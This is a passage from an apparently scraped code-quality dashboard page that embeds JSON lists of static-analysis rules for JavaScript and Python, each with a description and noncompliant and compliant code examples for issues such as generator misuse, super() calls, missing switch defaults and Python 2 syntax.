...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar {a = {}, b} = myObj;\nfunction foo({first = [], second}) {\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3828","repo":"javascript","name":"\"yield\" expressions should not be used outside generators","htmlDesc":"<p>The <code>yield<\/code> keyword is used in a generator function to return an <code>IteratorResult<\/code> to the caller. It has no other purpose, and\nif found outside such a function will raise a <code>ReferenceError<\/code> because it is then treated as an identifier.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n for (var i = 0; i < 5; i++) {\n yield i * 2;\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction * foo() {\n for (var i = 0; i < 5; i++) {\n yield i * 2;\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3834","repo":"javascript","name":"\"Symbol\" should not be used as a constructor","htmlDesc":"<p><code>Symbol<\/code> is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.<\/p>\n<p>An instance can only be created by using <code>Symbol<\/code> as a function. Using <code>Symbol<\/code> with the <code>new<\/code> operator will raise\na <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst sym = new Symbol(\"foo\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst sym = Symbol(\"foo\");\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3854","repo":"javascript","name":"super() should be invoked appropriately","htmlDesc":"<p>There are situations where <code>super()<\/code> must be invoked and situations where <code>super()<\/code> cannot be invoked.<\/p>\n<p>The basic rule is: a constructor in a non-derived class cannot invoke <code>super()<\/code>; a constructor in a derived class must invoke\n<code>super()<\/code>.<\/p>\n<p>Furthermore:<\/p>\n<p>- <code>super()<\/code> must be invoked before the <code>this<\/code> and <code>super<\/code> keywords can be used.<\/p>\n<p>- <code>super()<\/code> must be invoked with the same number of arguments as the base class' constructor.<\/p>\n<p>- <code>super()<\/code> can only be invoked in a constructor - not in any other method.<\/p>\n<p>- <code>super()<\/code> cannot be invoked multiple times in the same constructor.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Animal {\n constructor() {\n super(); \/\/ Noncompliant, super() cannot be invoked in a base class\n }\n\n doSomething() {\n }\n}\n\nclass Dog extends Animal {\n constructor(name) {\n this.name = name;\n super.doSomething();\n super(); \/\/ Noncompliant, super() must be invoked before \"this\" or \"super\" is used\n }\n\n doSomething() {\n super(); \/\/ Noncompliant, super() cannot be invoked outside of a constructor\n }\n}\n\nclass Labrador extends Dog {\n constructor(name) {\n super(); \/\/ Noncompliant, super() must be invoked with one argument\n }\n}\n\nclass GermanShepherd extends Dog {\n constructor(name) {\n } \/\/ Noncompliant, super() must be invoked in constructor of derived class\n}\n\nclass FilaBrasileiro extends Dog {\n constructor(name) {\n super(name);\n super(name); \/\/ Noncompliant, super() can only be invoked once\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Animal {\n constructor() {\n }\n\n doSomething() {\n }\n}\n\nclass Dog extends Animal {\n constructor(name) {\n super();\n this.name = name;\n super.doSomething();\n }\n\n doSomething() {\n }\n}\n\nclass Labrador extends Dog {\n constructor(name) {\n super(name);\n }\n}\n\nclass GermanShepherd extends Dog {\n constructor(name) {\n super(name);\n }\n}\n\nclass FilaBrasileiro extends Dog {\n constructor(name) {\n super(name);\n }\n}\n<\/pre>\n<h2>Known Limitations<\/h2>\n<ul>\n <li>False negatives: some issues are not raised if the base class is not defined in the same file as the current class.<\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3923","repo":"javascript","name":"All branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having all branches in a <code>switch<\/code> or <code>if<\/code> chain with the same implementation is an error. Either a copy-paste error was made\nand something different should be executed, or there shouldn't be a <code>switch<\/code>\/<code>if<\/code> chain at all. Note that this rule does not\napply to <code>if<\/code> chains without <code>else<\/code>s, or to <code>switch<\/code>es without <code>default<\/code> clauses.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (b == 0) { \/\/ Noncompliant\n doOneMoreThing();\n}\nelse {\n doOneMoreThing();\n}\n\nlet a = (b == 0) ? getValue() : getValue(); \/\/ Noncompliant\n\nswitch (i) { \/\/ Noncompliant\n case 1:\n doSomething();\n break;\n case 2:\n doSomething();\n break;\n case 3:\n doSomething();\n break;\n default:\n doSomething();\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S888","repo":"javascript","name":"Equality operators should not be used in \"for\" loop termination conditions","htmlDesc":"<p>Testing <code>for<\/code> loop termination using an equality operator (<code>==<\/code> and <code>!=<\/code>) is dangerous, because it could set up an\ninfinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an\ninfinite loop.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 1; i != 10; i += 2) \/\/ Noncompliant. Infinite; i goes from 9 straight to 11.\n{\n \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 1; i <= 10; i += 2) \/\/ Compliant\n{\n \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Equality operators are ignored if the loop counter is not modified within the body of the loop and either:<\/p>\n<ul>\n <li> starts below the ending value and is incremented by 1 on each iteration. <\/li>\n <li> starts above the ending value and is decremented by 1 on each iteration. <\/li>\n<\/ul>\n<p>Equality operators are also ignored when the test is against <code>null<\/code>.<\/p>\n<pre>\nfor (var i = 0; arr[i] != null; i++) {\n \/\/ ...\n}\n\nfor (var i = 0; (item = arr[i]) != null; i++) {\n \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 6-5-2 <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/835\">MITRE, CWE-835<\/a> - Loop with Unreachable Exit Condition ('Infinite Loop') <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwDJAQ\">CERT, MSC21-C.<\/a> - Use robust loop termination conditions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/GwDJAQ\">CERT, MSC21-CPP.<\/a> - Use inequality to terminate a loop whose counter changes\n by more than one <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:StrictMode","repo":"javascript","name":"\"strict\" mode should be used with caution","htmlDesc":"<p>Even thought it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not\nsupport it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not\nsupport it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction strict() {\n 'use strict';\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:SwitchWithoutDefault","repo":"javascript","name":"\"switch\" statements should end with \"default\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (param) { \/\/missing default clause\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n}\n\nswitch (param) {\n default: \/\/ default clause should be the last one\n error();\n break;\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (param) {\n case 0:\n doSomething();\n break;\n case 1:\n doSomethingElse();\n break;\n default:\n error();\n break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:UnusedVariable","repo":"javascript","name":"Unused local variables and functions should be removed","htmlDesc":"<p>If a local variable or a local function is declared but not used, it is dead code and should be removed. Doing so will improve maintainability\nbecause developers will not wonder what the variable or function is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n var seconds = 0; \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:VariableShadowing","repo":"javascript","name":"Variables should not be shadowed","htmlDesc":"<p>Overriding a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of code.\nFurther, it could lead maintainers to introduce bugs because they think they're using one variable but are really using another.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nshow: function(point, element) {\n if (!this.drops.length) return;\n var drop, affected = [];\n this.drops.each( function(drop) { \/\/ Non-Compliant; defines a new 'drop' parameter\n if(Droppables.isAffected(point, element, drop))\n affected.push(drop);\n });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nshow: function(point, element) {\n if (!this.drops.length) return;\n var drop, affected = [];\n this.drops.each( function(aDrop) {\n if(Droppables.isAffected(point, element, aDrop))\n affected.push(aDrop);\n });\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 5.2 - Identifiers in an inner scope shall not use the same name as an identifier in an outer scope, and therefore hide that\n identifier <\/li>\n <li> MISRA C++:2008, 2-10-2 - Identifiers declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n <li> MISRA C:2012, 5.3 - An identifier declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/VwE\">CERT, DCL01-C.<\/a> - Do not reuse variable names in subscopes <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/cwAhAQ\">CERT, DCL01-CPP.<\/a> - Do not reuse variable names in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:WithStatement","repo":"javascript","name":"\"with\" statements should not be used","htmlDesc":"<p>The use of the <code>with<\/code> keyword produces an error in JavaScript strict mode code. However, that's not the worst that can be said against\n<code>with<\/code>.<\/p>\n<p>Using <code>with<\/code> allows a short-hand access to an object's properties - assuming they're already set. But use <code>with<\/code> to access\nsome property not already set in the object, and suddenly you're catapulted out of the object scope and into the global scope, creating or overwriting\nvariables there. Since the effects of <code>with<\/code> are entirely dependent on the object passed to it, <code>with<\/code> can be dangerously\nunpredictable, and should never be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n y: 1\n}\n\nwith (foo) { \/\/ Noncompliant\n y = 4; \/\/ updates foo.x\n x = 3; \/\/ does NOT add a foo.x property; updates x var in outer scope\n}\nprint(foo.x + \" \" + x); \/\/ shows: undefined 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n y: 1\n}\n\nfoo.y = 4;\nfoo.x = 3;\n\nprint(foo.x + \" \" + x); \/\/ shows: 3 a\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"}],"language":"js","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
window.data = {"total":23,"p":1,"ps":500,"rules":[{"key":"common-py:FailedUnitTests","repo":"common-py","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"Pylint:E0203","repo":"Pylint","name":"Access to member before its definition","htmlDesc":"Used when an instance member is accessed before it's actually assigned.","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"CODE_SMELL"},{"key":"Pylint:E1101","repo":"Pylint","name":"Access of nonexistent member","htmlDesc":"Used when a variable is accessed for an nonexistent member.","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"CODE_SMELL"},{"key":"python:BackticksUsage","repo":"python","name":"Backticks should not be used","htmlDesc":"<p>Backticks are a deprecated alias for <code>repr()<\/code>. Don't use them any more, the syntax was removed in Python 3.0.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nreturn `num` # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn repr(num)\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:ExecStatementUsage","repo":"python","name":"The \"exec\" statement should not be used","htmlDesc":"<p>Use of the <code>exec<\/code> statement could be dangerous, and should be avoided. Moreover, the <code>exec<\/code> statement was removed in Python\n3.0. Instead, the built-in <code>exec()<\/code> function can be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nexec 'print 1' # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nexec('print 1')\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:FunctionComplexity","repo":"python","name":"Functions should not be too complex","htmlDesc":"<p>The Cyclomatic Complexity of functions should not exceed a defined threshold. Complex code may perform poorly and can be difficult to test\nthoroughly.<\/p>","status":"READY","tags":["rank2"],"langName":"Python","params":[{"key":"maximumFunctionComplexityThreshold","htmlDesc":"The maximum authorized complexity in function","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"python:InequalityUsage","repo":"python","name":"\"<>\" should not be used to test inequality","htmlDesc":"<p>The forms <code><><\/code> and <code>!=<\/code> are equivalent. But in Python 2.7.3 the <code><><\/code> form is considered obsolete.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nreturn a <> b # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nreturn a != b\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"CODE_SMELL"},{"key":"python:PreIncrementDecrement","repo":"python","name":"Increment and decrement operators should not be used","htmlDesc":"<p>Python has no pre\/post increment\/decrement operator. For instance, <code>x++<\/code> and <code>x--<\/code> will fail to parse. More importantly,\n<code>++x<\/code> and <code>--x<\/code> will do nothing. To increment a number, simply write <code>x += 1<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n++x # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nx += 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:PrintStatementUsage","repo":"python","name":"The \"print\" statement should not be used","htmlDesc":"<p>The <code>print<\/code> statement was removed in Python 3.0. The built-in function should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nprint '1' # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nprint('1')\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S134","repo":"python","name":"Control flow statements \"if\", \"for\", \"while\", \"try\" and \"with\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>try<\/code>, and <code>with<\/code> statements are key ingredients for making\nwhat's known as \"Spaghetti code\". Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>The following code snippet illustrates this rule with the default threshold of 3.<\/p>\n<pre>\n if condition1: # Compliant - depth = 1\n # ...\n if condition2: # Compliant - depth = 2\n # ...\n for i in range(10): # Compliant - depth = 3, not exceeding the limit\n # ...\n if condition4: # Non-Compliant - depth = 4\n if condition5: # Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n # ...\n<\/pre>","status":"READY","tags":["rank2"],"langName":"Python","params":[{"key":"max","htmlDesc":"Maximum allowed "if", "for", "while", "try" and "with" statements nesting depth","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"python:S1656","repo":"python","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nname = name\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nname = other.name\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S1700","repo":"python","name":"A field should not duplicate the name of its containing class","htmlDesc":"<p>It's confusing to have a class member with the same name (case differences aside) as its enclosing class. This is particularly so when you consider\nthe common practice of naming a class instance for the class itself.<\/p>\n<p>Best practice dictates that any field or member with the same name as the enclosing class be renamed to be more descriptive of the particular\naspect of the class it represents or holds.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo:\n foo = ''\n\n def getFoo(self):\n ...\n\nfoo = Foo()\nfoo.getFoo() # what does this return?\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo:\n name = ''\n\n def getName(self):\n ...\n\nfoo = Foo()\nfoo.getName()\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"CODE_SMELL"},{"key":"python:S1716","repo":"python","name":"\"break\" and \"continue\" should not be used outside a loop","htmlDesc":"<p><code>break<\/code> and <code>continue<\/code> are unstructured control flow statements which make code harder to read. Additionally, more recent\nversions of Python raise a SyntaxError when modules containing <code>break<\/code> or <code>continue<\/code> outside of a loop are imported.<\/p>\n<p>Therefore, these statements should not be used outside of loops. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nnarg=len(sys.argv)\nif narg == 1:\n print('@Usage: input_filename nelements nintervals')\n break\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif narg == 1:\n print('@Usage: input_filename nelements nintervals')\n sys.exit()\n<\/pre>","status":"READY","tags":["rank2"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S1717","repo":"python","name":"\"\\\" should only be used as an escape character outside of raw strings","htmlDesc":"<p>Typically, backslashes are seen only as part of escape sequences. Therefore, the use of a backslash outside of a raw string or escape sequence\nlooks suspiciously like a broken escape sequence. <\/p>\n<p>Characters recognized as escape-able are: <code>abfnrtvox\\'\"<\/code><\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ns = \"Hello \\world.\"\nt = \"Nice to \\ meet you\"\nu = \"Let's have \\ lunch\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ns = \"Hello world.\"\nt = \"Nice to \\\\ meet you\"\nu = r\"Let's have \\ lunch\" \/\/ raw string\n<\/pre>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S1763","repo":"python","name":"Jump statements should not be followed by other statements","htmlDesc":"<p>Jump statements (<code>return<\/code>, <code>break<\/code>, <code>continue<\/code>, and <code>raise<\/code>) move control flow out of the current code\nblock. Typically, any statements in a block that come after a jump are simply wasted keystrokes lying in wait to confuse the unwary. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ndef fun(a):\n i = 10\n return i + a # Noncompliant\n i += 1 # this is never executed\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndef fun(a):\n i = 10\n return i + a\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.1 - There shall be no unreachable code <\/li>\n <li> MISRA C++:2008, 0-1-1 - A project shall not contain unreachable code <\/li>\n <li> MISRA C++:2008, 0-1-9 - There shall be no dead code <\/li>\n <li> MISRA C:2012, 2.1 - A project shall not contain unreachable code <\/li>\n <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/561.html\">MITRE, CWE-561<\/a> - Dead Code <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/uQCSBg\">CERT, MSC56-J.<\/a> - Detect and remove superfluous code and values <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S1764","repo":"python","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif a == a: # Noncompliant\n work()\n\nif a != a: # Noncompliant\n work()\n\nif a == b and a == b: # Noncompliant\n work()\n\nif a == b or a == b: # Noncompliant\n work()\n\nj = 5 \/ 5 # Noncompliant\nk = 5 - 5 # Noncompliant\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The following are ignored:<\/p>\n<ul>\n <li> The expression <code>1 << 1<\/code> <\/li>\n<\/ul>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> <a href='\/coding_rules#rule_key=python%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S1845","repo":"python","name":"Methods and field names should not differ only by capitalization","htmlDesc":"<p>Looking at the set of methods and fields in a <code>class<\/code> and finding two that differ only by capitalization is confusing to users of the\nclass.<\/p>\n<p>This situation may simply indicate poor naming. Method names should be action-oriented, and thus contain a verb, which is unlikely in the case\nwhere both a method and a field have the same name (with or without capitalization differences). However, renaming a public method could be disruptive\nto callers. Therefore renaming the member is the recommended action.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass:\n lookUp = false\n def lookup(): # Non-compliant; method name differs from field name only by capitalization\n pass\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass:\n lookUp = false\n def getLookUp():\n pass\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"CODE_SMELL"},{"key":"python:S1862","repo":"python","name":"Related \"if\/else if\" statements should not have the same condition","htmlDesc":"<p>A chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will be executed: the first\none with a condition that evaluates to <code>true<\/code>. <\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif param == 1:\n openWindow()\nelif param == 2:\n closeWindow()\nelif param == 1: # Noncompliant\n moveWindowToTheBackground()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif param == 1:\n openWindow()\nelif param == 2:\n closeWindow()\nelif param == 3:\n moveWindowToTheBackground()\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S2711","repo":"python","name":"\"yield\" and \"return\" should not be used outside functions","htmlDesc":"<p><code>yield<\/code> and <code>return<\/code> only make sense in the context of functions. Using them outside a function raises a\n<code>SyntaxError<\/code>. To break out of a loop, use <code>break<\/code> instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass:\n while True:\n return False #Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S2712","repo":"python","name":"\"return\" and \"yield\" should not be used in the same function","htmlDesc":"<p>Functions that use <code>yield<\/code> are known as \"generators\", and generators cannot <code>return<\/code> values. Similarly, functions that use\n<code>return<\/code> cannot use <code>yield<\/code>. Doing so will cause a <code>SyntaxError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ndef adder(n):\n num = 0\n while num < n:\n yield num\n num += 1\n return num #Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S2733","repo":"python","name":"\"__exit__\" should accept type, value, and traceback arguments","htmlDesc":"<p>The <code>__exit__<\/code> method is invoked with four arguments: self, type, value and traceback. Leave one of these out of the method declaration\nand the result will be a <code>TypeError<\/code> at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass:\n def __enter__(self):\n pass\n def __exit__(self, exc_type, exc_val): # Noncompliant\n pass\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S2734","repo":"python","name":"\"__init__\" should not return a value","htmlDesc":"<p>By contract, every Python function returns something, even if it's the <code>None<\/code> value, which can be returned implicitly by omitting the\n<code>return<\/code> statement, or explicitly. <\/p>\n<p>The <code>__init__<\/code> method is required to return <code>None<\/code>. A <code>TypeError<\/code> will be raised if the <code>__init__<\/code>\nmethod either <code>yield<\/code>s or <code>return<\/code>s any expression other than <code>None<\/code>. Returning some expression that evaluates to\n<code>None<\/code> will not raise an error, but is considered bad practice.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass(object):\n def __init__(self):\n self.message = 'Hello'\n return self # Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass(object):\n def __init__(self):\n self.message = 'Hello'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"Python","params":[],"type":"BUG"},{"key":"python:S3776","repo":"python","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"Python","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"}],"language":"py","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
